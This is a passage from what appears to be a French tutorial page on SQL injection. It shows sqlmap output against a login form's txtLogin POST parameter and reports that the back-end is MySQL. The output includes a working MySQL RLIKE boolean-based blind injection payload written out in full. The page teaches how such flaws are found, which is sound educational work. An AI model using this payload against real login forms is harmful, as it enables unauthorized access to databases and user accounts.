Vous avez des améliorations (ou des corrections) à proposer pour ce document :
je vous remerçie par avance de m'en faire part, cela m'aide à améliorer le site.
sqlmap identified the following injection point(s) with a total of 4023 HTTP(s) requests:
---
Parameter: txtLogin (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: txtLogin=x' RLIKE (SELECT (CASE WHEN (3074=3074) THEN 0x78 ELSE 0x28 END))-- rWGJ&txtPassword=y
---
[08:49:36] [INFO] the back-end DBMS is MySQL
Il faut noter que SqlMap a même réussit à déterminer la nature de votre moteur de base de données. C'est normal, chaque moteur a ses propres failles en termes d'« injection SQL ».
Améliorations / Corrections
Vous avez des améliorations (ou des corrections) à proposer pour ce document : je vous remerçie par avance de m'en faire part, cela m'aide à améliorer le site.
Emplacement :
Description des améliorations :